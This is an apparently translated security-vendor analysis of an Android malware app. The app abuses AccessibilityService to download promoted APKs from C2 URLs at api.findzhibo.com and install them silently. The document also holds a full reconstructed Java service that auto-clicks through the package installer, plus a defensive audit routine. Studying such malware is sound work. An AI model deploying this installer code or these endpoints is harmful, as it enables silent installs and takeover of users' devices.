Ali Mobile Security · 2015/12/18 16:55

Author:[email protected]

0x00 Malicious Application Overview


In recent years many Android app markets have implemented root-free installation: as soon as a download completes, the app is installed automatically without user interaction. The black-market promotion industry has adopted the same technique for silent installs. We recently intercepted a large number of malicious applications that use AccessibilityService to install other applications silently. Once the malicious accessibility service is enabled, the application pops up advertisements; even if the user closes the pop-up, the promoted package is downloaded in the background and then installed automatically.

0x01 AccessibilityService


What AccessibilityService is for:

Android Accessibility exists for users who cannot easily operate an Android phone because of vision, hearing or other physical impairments; it provides accessibility features and services that make the device easier to use. Developers can build their own accessibility services to improve the usability of their applications. Once an AccessibilityService is enabled, the hosting application receives the window element information of whatever application the user is currently operating, in real time, and the interaction is two-way: the service not only sees user input but can also act on window elements, for example by clicking a button.

Figure: AccessibilityService

Android app markets use Accessibility to install applications without root. Red-envelope-grabbing apps likewise use AccessibilityService to grab red envelopes automatically.

0x02 Malicious Application Analysis


We detected an app named “WiFi Password Viewer (Enhanced)” abusing AccessibilityService. After launch, the application induces the user to enable a “WIFI signal enhancement service”, which is in fact the malicious application's own AccessibilityService. Its “view WIFI password” feature induces the user to grant the application root permission. Both are groundwork for the malicious automatic installation. The application is shown below.

Figure: application startup and the guide to enabling “WIFI signal enhancement”

When the app starts it guides the user to enable “WIFI signal enhancement”; the ACCESSIBILITY_SETTINGS screen it opens prompts the user to turn on the “Wifi signal enhancement service” to boost signal strength. Once the service is enabled, the phone starts downloading the application packages prepared by the application's cloud server one after another and automatically installs and launches them.

Figure: the accessibility service settings screen

The flow of the malicious code is shown below.

Figure: malicious code and cloud message flow

Flow chart analysis

  1. Wifi_list module. The malicious application uses “WIFI signal enhancement” to induce the user to enable its AccessibilityService, and “view WIFI password” to induce the user to grant it root permission.
  2. PushDownLoad module, made up of the PushCoreService and ChapingCoreService services. These background services upload device information, fetch the list of application packages to be pushed, and download those packages.
  3. Install module. The malicious application parses each successfully downloaded package and then pops up the DialogPushActivity ad box. Without root it installs through the AccessibilityService; with root it completes the silent installation with pm install.
  4. Daemon module. Daemon is an ELF file stored in the raw directory. It is a daemon process that keeps the application from being killed: it forks a child process, which becomes the session leader of a new session and is thereby detached from the parent's session and process group. The child then periodically starts the Java tasks it is configured with. Here it guarantees that PushCoreService and ChapingCoreService keep running in the background.

The core service PushCoreService is traced below.

It first POSTs the device's IMEI, WiFi MAC and serial number to the target server; the server returns a uuid, which is saved in the “uuid” field of the DefaultSharedPreferences file.

Figure: requesting the UUID from the server

The last call above, this.m_context.handler.sendEmptyMessage(1), starts the GetPushThread thread. The thread requests http://api.findzhibo.com/ad/open?appCode=1&appVersion=<appVersion> (appVersion being the running app's version) to fetch the “open_status” field for the current application. The cloud-side push runs only while open_status is true; otherwise the cloud service for this application version is treated as switched off, which gives the operator a remote kill switch per version. When it is on, the thread sends a POST request to http://api.findzhibo.com/index.php/ad/push; the server returns the applications to be pushed, which are written to the push_json field of “cc_push_sp.xml”.

Figure: push_json describing the promoted applications, as returned by the cloud

Figure: the cloud request that fetches the promoted applications

The last call above, this.m_context.handler.sendEmptyMessage(2), parses the push_json field into an Intent and starts PushDownloadService, which downloads the application and shows the malicious pop-up ad page. PushDownloadService parses appJson to obtain the download information and then drives the download and installation through Handler messages.

Figure: parsing appJson, then downloading and installing

The Handler handles four msg.what values: 3 handles download failure; 4 handles download success and, if the accessibility service is enabled, starts WifiZengQiangService; 6 shows the DialogPushActivity ad box and launches the promoted application (5 is the non-root install path, described below). The service first sends 4 to kick off the background download and then starts the download-and-install thread. The thread checks whether the application pushed this time has already been downloaded to the designated directory: /sdcard/.wifi_ckq holds the downloaded packages and advertising images, with file names derived from the MD5 hash of appName.

Figure: the SD card directory holding the downloaded promoted packages

Figure: downloading the promoted application

When the download completes, the silent install is triggered. On a non-rooted device the service sends 5; on a rooted device it installs the package with pm install and then sends 6 to launch it.

Figure: sending the Handler message that installs the application

Handler messages 5 and 6 both start DialogPushActivity.

Figure: starting DialogPushActivity

DialogPushActivity is essentially an ImageView; when the user touches it, the pushed application is installed automatically.

Figure: the DialogPushActivity screen

It then starts the WifiZengQiangService auto-install service. Families such as Ghost Push and Kemoge first root the device and then implant promoted applications; here, once the malicious app's AccessibilityService is enabled, the ad screen is shown, and even if the victim closes the pop-up the promoted app is downloaded and installed successfully. The installation hands the package to the system PackageInstaller, reads the positions of the buttons on the installer screens, and uses the simulated-click capability of Accessibility to press Next on the user's behalf until the installation completes. The pop-up ad below starts the download and installation when touched; the image after it shows the installer screen brought up through the AccessibilityService.

Figure: invoking the system PackageInstaller

The service's onAccessibilityEvent method handles not only com.android.packageinstaller events but also events from several security products, so the malicious application gains full control over those products' behaviour: it can install, launch and uninstall any app automatically, and it uses the AccessibilityService to keep the security software from killing it.

Figure: the AccessibilityService acting on the listed application packages
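To make concrete what the two-way interaction described in 0x01 and the auto-install loop described above look like in code, here is an added illustrative AccessibilityService. It was written for this edit and is not the sample's code nor code from the article; the class name, the installer package filter, the button labels and the installIntent helper are assumptions (the sample's own list of handled packages and labels is only visible in the figure).

```java
import android.accessibilityservice.AccessibilityService;
import android.accessibilityservice.AccessibilityServiceInfo;
import android.content.Intent;
import android.net.Uri;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityNodeInfo;
import java.io.File;
import java.util.Arrays;
import java.util.List;

// Illustrative reconstruction of the auto-install technique the article describes.
// Not the sample's code; class name, package filter and button labels are assumptions.
public class AutoInstallService extends AccessibilityService {

    // Package that draws the system install dialog on Android 5/6 era devices
    // (assumption: some vendor builds use a different installer package).
    private static final String PACKAGE_INSTALLER = "com.android.packageinstaller";

    // Button labels to press, in the order the installer shows them. English and Chinese
    // labels are assumed; the sample's real list is not reproduced in the article.
    private static final List<String> BUTTON_LABELS = Arrays.asList(
            "Next", "Install", "Done", "Open", "下一步", "安装", "完成", "打开");

    @Override
    protected void onServiceConnected() {
        // Narrow event delivery to the installer's window-state and content-change events,
        // the same thing the XML <accessibility-service> descriptor would declare.
        AccessibilityServiceInfo info = new AccessibilityServiceInfo();
        info.eventTypes = AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED
                | AccessibilityEvent.TYPE_WINDOW_CONTENT_CHANGED;
        info.packageNames = new String[] { PACKAGE_INSTALLER };
        info.feedbackType = AccessibilityServiceInfo.FEEDBACK_GENERIC;
        info.flags = AccessibilityServiceInfo.DEFAULT;
        setServiceInfo(info);
    }

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        // Root of the installer's current window; null while no window is active.
        AccessibilityNodeInfo root = getRootInActiveWindow();
        if (root == null) return;
        try {
            for (String label : BUTTON_LABELS) {
                // findAccessibilityNodeInfosByText matches substrings, so "Install" also
                // matches "Install anyway"; for the malicious use that is desirable.
                List<AccessibilityNodeInfo> hits = root.findAccessibilityNodeInfosByText(label);
                if (hits == null) continue;
                for (AccessibilityNodeInfo node : hits) {
                    if (clickNode(node)) {
                        return; // one click per event; the next event carries the next screen
                    }
                }
            }
        } finally {
            root.recycle();
        }
    }

    // Click the node, or its nearest clickable ancestor, if it is enabled.
    private boolean clickNode(AccessibilityNodeInfo node) {
        AccessibilityNodeInfo target = node;
        while (target != null && !target.isClickable()) {
            target = target.getParent();
        }
        if (target == null || !target.isEnabled()) return false;
        return target.performAction(AccessibilityNodeInfo.ACTION_CLICK);
    }

    @Override
    public void onInterrupt() {
        // Nothing to stop: each click is fired synchronously from onAccessibilityEvent.
    }

    // How a downloaded APK is handed to the system installer (assumption: a file:// URI,
    // which was accepted on the Android versions current in 2015).
    public static Intent installIntent(File apk) {
        Intent intent = new Intent(Intent.ACTION_VIEW);
        intent.setDataAndType(Uri.fromFile(apk), "application/vnd.android.package-archive");
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        return intent;
    }
}
```

For this to work the service must be declared in the manifest with the android.permission.BIND_ACCESSIBILITY_SERVICE permission and an accessibilityservice meta-data entry, and the user must switch it on in Settings > Accessibility; that mandatory user step is exactly what the “WIFI signal enhancement” lure exists to obtain. Once enabled, the only thing standing between the app and a silent install is whether the installer's buttons can be found by label, which is why the sample filters events by package rather than by screen layout.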

After the promoted application is installed, the system broadcasts android.intent.action.PACKAGE_ADDED; the AppListenerReceiver class receives the broadcast and launches the application.

0x03 Summary and Suggestions


This completes the analysis of the AccessibilityService abuse. The app used “WIFI signal enhancement” to entice users into enabling Accessibility and “view WIFI password” to obtain root access. Be careful about enabling AccessibilityService for untrusted applications, since an enabled service can read and operate every screen and thereby control the phone. The currently popular red-envelope-grabbing apps also use AccessibilityService to implement automatic grabbing, and we have found attackers using an “automatic red envelope grabbing service” as the lure to get users to enable an AccessibilityService that controls their phone. Users are advised to download red-envelope-grabbing software only from safe channels to avoid unnecessary losses.
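As an added defensive check, not taken from the article or from any product, the following Java routine is what a security app or a triage tool can run on a device to list enabled accessibility services that were not shipped in the system image and can read window content, which is the profile of the abuse analysed above. The class and method names are my own.

```java
import android.accessibilityservice.AccessibilityServiceInfo;
import android.content.ComponentName;
import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager;
import android.content.pm.ServiceInfo;
import android.provider.Settings;
import android.text.TextUtils;
import android.view.accessibility.AccessibilityManager;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

// Added triage helper (not from the article). Flags enabled accessibility services that
// are third-party and able to walk the node tree of other apps' windows.
public final class AccessibilityAudit {

    // One finding per enabled service worth a second look, e.g.
    // "com.example.wifi/.WifiZengQiangService scope=all packages installer=unknown (sideloaded?)"
    public static List<String> suspiciousEnabledServices(Context ctx) {
        List<String> findings = new ArrayList<>();
        AccessibilityManager am =
                (AccessibilityManager) ctx.getSystemService(Context.ACCESSIBILITY_SERVICE);
        PackageManager pm = ctx.getPackageManager();
        for (AccessibilityServiceInfo info
                : am.getEnabledAccessibilityServiceList(AccessibilityServiceInfo.FEEDBACK_ALL_MASK)) {
            ServiceInfo svc = info.getResolveInfo().serviceInfo;
            ApplicationInfo app = svc.applicationInfo;
            boolean systemApp = (app.flags & ApplicationInfo.FLAG_SYSTEM) != 0;
            // Declared in the service's XML descriptor; without this capability the service
            // cannot call getRootInActiveWindow() and therefore cannot find buttons to click.
            boolean readsWindows = (info.getCapabilities()
                    & AccessibilityServiceInfo.CAPABILITY_CAN_RETRIEVE_WINDOW_CONTENT) != 0;
            if (systemApp || !readsWindows) continue;
            // An empty packageNames filter means the service receives events from every app,
            // including the package installer and any security product.
            String scope = (info.packageNames == null || info.packageNames.length == 0)
                    ? "all packages" : Arrays.toString(info.packageNames);
            String installer = pm.getInstallerPackageName(svc.packageName);
            findings.add(svc.packageName + "/" + svc.name
                    + " scope=" + scope
                    + " installer=" + (installer == null ? "unknown (sideloaded?)" : installer));
        }
        return findings;
    }

    // The same list as the system stores it: a colon-separated string of component names,
    // identical to what `adb shell settings get secure enabled_accessibility_services` prints.
    public static List<ComponentName> enabledServicesFromSettings(Context ctx) {
        List<ComponentName> out = new ArrayList<>();
        String raw = Settings.Secure.getString(ctx.getContentResolver(),
                Settings.Secure.ENABLED_ACCESSIBILITY_SERVICES);
        if (TextUtils.isEmpty(raw)) return out;
        for (String flat : raw.split(":")) {
            ComponentName cn = ComponentName.unflattenFromString(flat);
            if (cn != null) out.add(cn);
        }
        return out;
    }
}
```

Both methods need no special permission, so a security product can run them at every scan and, for any finding, show the user which app has the capability and when it was granted. Off-device, the same information comes from adb with `settings get secure enabled_accessibility_services` and `dumpsys accessibility`; a reviewer should also confirm from the APK's manifest that the flagged service is declared with BIND_ACCESSIBILITY_SERVICE, since that is what lets it be enabled at all.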